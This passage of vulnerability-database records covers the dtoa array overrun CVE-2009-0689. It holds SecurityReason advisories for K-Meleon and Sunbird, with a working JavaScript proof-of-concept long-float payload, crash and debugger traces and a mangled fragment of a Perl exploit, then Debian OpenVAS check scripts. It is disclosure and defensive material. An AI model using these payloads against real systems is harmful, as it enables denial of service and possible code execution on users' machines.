fix:\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib
/libc/gdtoa/strtopQ.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c\n\n\n- --- 5. Credits ---\nDiscovered by Maksymilian Arciemowicz and sp3x from SecurityReason.com.\n\n\n- --- 6. Greets ---\nInfospec p_e_a pi3\n\n\n- --- 7. 
Contact ---\nEmail:\n- - cxib {a.t] securityreason [d0t} com\n- - sp3x {a.t] securityreason [d0t} com\n\nGPG:\n- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg\n- - http://securityreason.com/key/sp3x.gpg\n\nhttp://securityreason.com/\nhttp://securityreason.pl/\n\n-----BEGIN PGP SIGNATURE-----\n\niEYEARECAAYFAksF4esACgkQpiCeOKaYa9bOkQCcDLKKqvSyE1ZJZebhBBiow8tV\nXqQAnR79bagErDfzJ3TV/MlLgrWXsGD7\n=/IkD\n-----END PGP SIGNATURE-----", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T19:04:24", "description": "\nK-Meleon 1.5.3 - Remote Array Overrun", "edition": 1, "published": "2009-11-19T00:00:00", "title": "K-Meleon 1.5.3 - Remote Array Overrun", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-1563", "CVE-2009-0689"], "modified": "2009-11-19T00:00:00", "id": "EXPLOITPACK:32D2B684D6A2AB9F4EF85B2B51DAB5DC", "href": "", "sourceData": "From Full Disclosure: http://seclists.org/fulldisclosure/2009/Nov/222\n\n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n[ K-Meleon 1.5.3 Remote Array Overrun (Arbitrary code execution) ]\n\nAuthor: Maksymilian Arciemowicz and sp3x\nhttp://SecurityReason.com\nDate:\n- - Dis.: 07.05.2009\n- - Pub.: 20.11.2009\n\nCVE: CVE-2009-0689\nRisk: High\nRemote: Yes\n\nAffected Software:\n- - K-Meleon 1.5.3\n\nNOTE: Prior versions may also be affected.\n\nOriginal URL:\nhttp://securityreason.com/achievement_securityalert/72\n\n\n- --- 0.Description ---\nK-Meleon is an extremely fast, customizable, lightweight web browser\nbased on the Gecko layout engine developed by Mozilla which is also used\nby Firefox. K-Meleon is free, open source software released under the\nGNU General Public License and is designed specifically for Microsoft\nWindows (Win32) operating systems.\n\n\n- --- 1. K-Meleon 1.5.3 Remote Array Overrun (Arbitrary code execution) ---\nThe main problem exist in dtoa implementation. K-Meleon has the same\ndtoa as a KDE, Opera and all BSD systems. 
This issue has been fixed in\nFirefox 3.5.4 and fix\n\nhttp://securityreason.com/achievement_securityalert/63\n\nbut fix for SREASONRES:20090625, used by openbsd was not good.\nMore information about fix for openbsd and similars SREASONRES:20091030,\n\nhttp://securityreason.com/achievement_securityalert/69\n\nWe can create any number of float, which will overwrite the memory. In\nKmax has defined 15. Functions in dtoa, don't checks Kmax limit, and it\nis possible to call 16<= elements of freelist array.\n\n\n- --- 2. Proof of Concept (PoC) ---\n\n- -----------------------\n<script>\nvar a=0.<?php echo str_repeat(\"1\",296450); ?>;\n</script>\n- -----------------------\n\nK-Meleon will crash with\n\nUnhandled exception at 0x01800754 in k-meleon.exe: 0xC0000005: Access\nviolation reading location 0x0bc576ec.\n\n01800754 mov eax,dword ptr [ecx]\n\nEAX 00000002 \nECX 0BC576EC \nEDI 028FEB51 \n\n\n- --- 3. SecurityReason Note ---\n\nOfficialy SREASONRES:20090625 has been detected in:\n- - OpenBSD\n- - NetBSD\n- - FreeBSD\n- - MacOSX\n- - Google Chrome\n- - Mozilla Firefox\n- - Mozilla Seamonkey\n- - KDE (example: konqueror)\n- - Opera\n- - K-Meleon\n\nThis list is not yet closed. US-CERT declared that will inform all\nvendors about this issue, however, they did not do it. Even greater\nconfusion caused new CVE number \"CVE-2009-1563\". Secunia has informed\nthat this vulnerability was only detected in Mozilla Firefox, but nobody\nwas aware that the problem affects other products like ( KDE, Chrome )\nand it is based on \"CVE-2009-0689\". 
After some time Mozilla Foundation\nSecurity Advisory\n(\"http://www.mozilla.org/security/announce/2009/mfsa2009-59.html\";)\nwas updated with note :\n\"The underlying flaw in the dtoa routines used by Mozilla appears to be\nessentially the same as that reported against the libc gdtoa routine by\nMaksymilian Arciemowicz ( CVE-2009-0689)\".\nThis fact ( new CVE number for Firefox Vulnerability )and PoC in\njavascript (from Secunia), forced us to official notification all other\nvendors. We publish all the individual advisories, to formally show all\nvulnerable software and to avoid wrong CVE number. We do not see any\nother way to fix this issue in all products.\n\nPlease note:\nPatch used in Firefox 3.5.4 does not fully solve the problem. Dtoa\nalgorithm is not optimal and allows remote Denial of Service in Firefox\n3.5.5 giving long float number.\n\n\n- --- 4. Fix ---\nNetBSD fix (optimal):\nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h\n\nOpenBSD fix:\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c\n\n\n- --- 5. Credits ---\nDiscovered by Maksymilian Arciemowicz and sp3x from SecurityReason.com.\n\n\n- --- 6. Greets ---\nInfospec p_e_a pi3\n\n\n- --- 7. Contact ---\nEmail:\n- - cxib {a.t] securityreason [d0t} com\n- - sp3x {a.t] securityreason [d0t} com\n\nGPG:\n- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg\n- - http://securityreason.com/key/sp3x.gpg\n\nhttp://securityreason.com/\nhttp://securityreason.pl/\n\n\n-----BEGIN PGP SIGNATURE-----\n\niEYEARECAAYFAksF4ZoACgkQpiCeOKaYa9bJsACgqjmxJmR9BORNOK3YhNUeyz+o\nl8EAn2V+5mXH7GLWp+btWMf+4fGDeIzw\n=Zqoe\n-----END PGP SIGNATURE-----", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T19:04:50", "description": "\nSunbird 0.9 - Array Overrun Code Execution", "edition": 1, "published": "2009-12-11T00:00:00", "title": "Sunbird 0.9 - Array Overrun Code Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0689"], "modified": "2009-12-11T00:00:00", "id": "EXPLOITPACK:D2EA9682808108DB6E2405A3FC3A4AF3", "href": "", "sourceData": "full disclosure: http://seclists.org/fulldisclosure/2009/Dec/253\n\n[ Sunbird 0.9 Array Overrun (code execution) ]\n\nAuthor: Maksymilian Arciemowicz and sp3x\nhttp://SecurityReason.com\nDate:\n- Dis.: 07.05.2009\n- Pub.: 11.12.2009\n\nCVE: CVE-2009-0689\nCWE: CWE-199\nRisk: High\nRemote: Yes\n\nAffected Software:\n- Sunbird 0.9\n\nNOTE: Prior versions may also be affected.\n\nOriginal URL:\nhttp://securityreason.com/achievement_securityalert/77\n\n\n--- 0.Description ---\nMozilla Sunbird is a cross-platform calendar application, built upon\nMozilla Toolkit. Our goal is to provide you with a full-featured and\neasy to use calendar application that you can use around the world.\n\n\n--- 1. Sunbird 0.9 Remote Array Overrun (Arbitrary code execution) ---\nThe main problem exist in dtoa implementation. Sunbird has the same dtoa\nas Firefox, etc. 
Problem exist in js3250.dll (version 4.0.0 - Netscape\n32-bit JavaScript Module) DLL library\n\nand it is the same like SREASONRES:20090625.\n\nhttp://securityreason.com/achievement_securityalert/63\n\nbut fix for SREASONRES:20090625, used by openbsd was not good.\nMore information about fix for openbsd and similars SREASONRES:20091030,\n\nhttp://securityreason.com/achievement_securityalert/69\n\nWe can create any number of float, which will overwrite the memory. In\nKmax has defined 15. Functions in dtoa, don't checks Kmax limit, and\nit is possible to call 16>test.ics');\nprint myfile $header.$s.$expl.$footer;\n-----------------------\n\n0:000> r\neax=015e06f9 ebx=00000001 ecx=658cebec edx=00000002 esi=015e0710\nedi=015e06f9\neip=600f154f esp=0012e330 ebp=0012e35c iopl=0 nv up ei pl nz na\npe nc\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000\nefl=00010206\njs3250!JS_strtod+0xb0a:\n600f154f 8b01 mov eax,dword ptr [ecx]\nds:0023:658cebec=????????\n0:000> ub 600f1551\njs3250!JS_strtod+0xaf2:\n600f1537 83c414 add esp,14h\n600f153a 8b75fc mov esi,dword ptr [ebp-4]\n600f153d e96bf5ffff jmp js3250!JS_strtod+0x68 (600f0aad)\n600f1542 56 push esi\n600f1543 57 push edi\n600f1544 8b7c240c mov edi,dword ptr [esp+0Ch]\n600f1548 8d0cbd08d01460 lea ecx,js3250!js_XMLClass+0x560\n(6014d008)[edi*4]\n600f154f 8b01 mov eax,dword ptr [ecx]\n0:000> !exchain\n0012fc9c: USER32!_except_handler3+0 (7e39048f)\nCRT scope 0, func: USER32!UserCallWinProc+10a (7e39ac2d)\n0012fcf4: USER32!_except_handler3+0 (7e39048f)\nCRT scope 0, filter: USER32!DispatchMessageWorker+113 (7e39074a)\nfunc: USER32!DispatchMessageWorker+126 (7e390762)\n0012fd5c: sunbird!jpeg_mem_term+eb7 (00849745)\n0012ffb0: sunbird!jpeg_fdct_islow+266a4 (00848818)\n0012ffe0: kernel32!_except_handler3+0 (7c839ac0)\nCRT scope 0, filter: kernel32!BaseProcessStart+29 (7c843882)\nfunc: kernel32!BaseProcessStart+3a (7c843898)\nInvalid exception stack at ffffffff\n0:000> k\nChildEBP RetAddr\nWARNING: Stack unwind information not 
available. Following frames may be\nwrong.\n0012e35c 600f15f3 js3250!JS_strtod+0xb0a\n0012e37c 600f0ef9 js3250!JS_strtod+0xbae\n0012e3f4 6010e8eb js3250!JS_strtod+0x4b4\n0012e448 6010e3c6 js3250!JSLL_MinInt+0x1dcf\n0012e46c 60103fb5 js3250!JSLL_MinInt+0x18aa\n0012e5dc 6010195e js3250!js_Invoke+0x2c1b\n0012e694 60101cb2 js3250!js_Invoke+0x5c4\n0012e71c 60101e0a js3250!js_Invoke+0x918\n0012e74c 6011350d js3250!js_Invoke+0xa70\n0012e7a4 600e3c41 js3250!js_FindProperty+0x974\n0012e7bc 004274cf js3250!JS_SetProperty+0x36\n0012e978 0042593e sunbird!NS_RegistryGetFactory+0x1c585\n0012ea44 6035c7f1 sunbird!NS_RegistryGetFactory+0x1a9f4\n0012ea60 6035d30b xpcom_core!nsXPTCStubBase::Stub3+0x20\n0012ea74 00421fde xpcom_core!XPTC_InvokeByIndex+0x27\n0012ec2c 0041fe00 sunbird!NS_RegistryGetFactory+0x17094\n0012ecc0 60101906 sunbird!NS_RegistryGetFactory+0x14eb6\n0012ed80 60101cb2 js3250!js_Invoke+0x56c\n0012ee08 60101e0a js3250!js_Invoke+0x918\n0012ee38 6011350d js3250!js_Invoke+0xa70\n\n\n--- 3. SecurityReason Note ---\nOfficialy SREASONRES:20090625 has been detected in:\n- OpenBSD\n- NetBSD\n- FreeBSD\n- MacOSX\n- Google Chrome\n- Mozilla Firefox\n- Mozilla Seamonkey\n- Mozilla Thunderbird\n- Mozilla Sunbird\n- Mozilla Camino\n- KDE (example: konqueror)\n- Opera\n- K-Meleon\n- F-Lock\n\nThis list is not yet closed.\n\n\n--- 4. 
Fix ---\nNetBSD fix (optimal):\nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h\n\nOpenBSD fix:\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c\n\n\n--- 5. Credits ---\nDiscovered by sp3x and Maksymilian Arciemowicz from SecurityReason.com.\n\n\n--- 6. Greets ---\nInfospec p_e_a pi3\n\n\n--- 7. 
Contact ---\nEmail:\n- cxib {a.t] securityreason [d0t} com\n- sp3x {a.t] securityreason [d0t} com\n\nGPG:\n- http://securityreason.com/key/Arciemowicz.Maksymilian.gpg\n- http://securityreason.com/key/sp3x.gpg\n\nhttp://securityreason.com/\nhttp://securityreason.pl/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2017-07-24T12:57:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1563", "CVE-2009-0689", "CVE-2009-2463"], "description": "The remote host is missing an update to nspr\nannounced via advisory DSA 1931-1.", "modified": "2017-07-07T00:00:00", "published": "2009-11-11T00:00:00", "id": "OPENVAS:66211", "href": "http://plugins.openvas.org/nasl.php?oid=66211", "type": "openvas", "title": "Debian Security Advisory DSA 1931-1 (nspr)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1931_1.nasl 6615 2017-07-07 12:09:52Z cfischer $\n# Description: Auto-generated from advisory DSA 1931-1 (nspr)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several vulnerabilities have been discovered in the NetScape Portable\nRuntime Library, which may lead to the execution of arbitrary code. The\nCommon Vulnerabilities and Exposures project identifies the following\nproblems:\n\nCVE-2009-1563\n\nA programming error in the string handling code may lead to the\nexecution of arbitrary code.\n\nCVE-2009-2463\n\nAn integer overflow in the Base64 decoding functions may lead to\nthe execution of arbitrary code.\n\nThe old stable distribution (etch) doesn't contain nspr.\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 4.7.1-5.\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 4.8.2-1.\n\nWe recommend that you upgrade your NSPR packages.\";\ntag_summary = \"The remote host is missing an update to nspr\nannounced via advisory DSA 1931-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201931-1\";\n\n\nif(description)\n{\n script_id(66211);\n script_version(\"$Revision: 6615 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:09:52 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-11 15:56:44 +0100 (Wed, 11 Nov 2009)\");\n script_cve_id(\"CVE-2009-2463\", \"CVE-2009-0689\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1931-1 (nspr)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libnspr4-0d\", ver:\"4.7.1-5\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libnspr4-0d-dbg\", ver:\"4.7.1-5\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libnspr4-dev\", ver:\"4.7.1-5\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:40:29", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1563", "CVE-2009-0689", "CVE-2009-2463"], "description": "The remote host is missing an update to nspr\nannounced via advisory DSA 1931-1.", "modified": "2018-04-06T00:00:00", "published": "2009-11-11T00:00:00", "id": "OPENVAS:136141256231066211", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066211", "type": "openvas", "title": "Debian Security Advisory DSA 1931-1 (nspr)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1931_1.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory DSA 1931-1 (nspr)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. 
